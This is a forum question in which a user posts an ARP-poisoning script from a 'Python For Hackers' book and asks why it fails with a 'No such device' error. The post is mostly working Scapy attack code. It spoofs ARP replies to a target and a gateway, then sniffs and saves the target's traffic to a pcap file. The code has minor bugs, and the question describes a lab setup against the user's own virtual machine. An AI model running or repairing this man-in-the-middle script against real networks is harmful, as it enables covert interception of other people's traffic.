# I'm making a small ARP poison script but its showing some error

Tags: python, linux, networking, packet-sniffers, arp

> I'm using Linux as attacker and as target i am using window 7 in
>   Virtualbox.
>
> window IP Add = 192.168.43.22 getway = 192.168.43.1 and i'm using wifi
>   as internet connection.

its showing this error **Exception IOError: IOError(19, 'No such    device')** 
i try many times but didn't get whats the problem is and this code is from **Python For Hackers** book.

> arper.py

```
interface = "en1" 
target_ip = "192.168.43.22"
gateway_ip = "192.168.43.1"
packet_count = 1000

conf.iface = interface
conf.verb = 0

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print "[*] Restoring trget..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac, count=5))
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac, count=5))
    os.kill(os.getpid(), signal.SIGINT)

def get_mac(ip_address):
    response, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /ARP(pdst=ip_address), timeout=2, retry=10)

    for s,r in response:
        return r[Ether].src
    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):

    poison_target = ARP()
    poison_target.op=2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_getway = ARP()
    poison_getway.op = 2
    poison_getway.psrc = target_ip
    poison_getway.pdst = gateway_ip
    poison_getway.hwdst = gateway_mac

    print "[*] Beginning the ARP poison. [CTRL_C to stop]"

    while True:
        try:
            send(poison_target)
            send(poison_getway)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac,target_ip,target_mac)
    print "[*] ARP poison attack finished."
    return      

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway Mac. Exiting"
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target Mac. Exiting"
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

poison_thread = threading.Thread(target = poison_target, argc= (gateway_ip, gateway_mac, target_ip,target_mac))
poison_thread.start()



try:
    print "[*] Strting sniffer for %d packets " % packet_count

    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter,iface=interface)
    wrpcap('arper.pcap',packets)
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac,target_ip,target_mac)
    sys.exit(0)
```

Comment: And first error show at get_mac() function